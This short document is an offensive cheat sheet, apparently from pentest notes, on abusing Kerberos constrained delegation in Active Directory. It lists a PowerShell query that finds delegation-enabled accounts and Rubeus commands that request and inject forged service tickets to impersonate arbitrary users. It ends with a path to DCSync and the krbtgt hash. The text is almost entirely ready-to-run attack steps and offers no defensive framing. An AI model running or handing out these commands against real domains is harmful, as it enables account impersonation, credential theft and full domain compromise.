The following actions require us to be in control of a user or machine object on which delegation is allowed.
Find out which accounts are trusted for delegation.
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Get the TGT for the account. Can be done only if we already have compromised the user.
The below command is executed from a terminal session running as the target user.
Rubeus.exe tgtdeleg
Use the acquired TGT to request a TGS for the desired service on the target machine.
Rubeus.exe s4u /ticket:<TGT> /impersonateuser:<SamAccountName> /dc:<domain-controller> /domain:<domain> /msdsspn:<service>/<machine> /ptt
We can request the TGT and the TGS in a single step.
Rubeus.exe s4u /user:<SamAccountName> /aes256:<AES HASH> /impersonateuser:<SamAccountName> /msdsspn:"service/machine" /ptt
No SPN validation is in place, that means we can request a TGS for any service running using the same account.
For example, we could get a TGS for HTTP allowing us remote connection, or in the case of a Domain Controller, LDAP to allow us to run DCSync and get the krbtgt hash.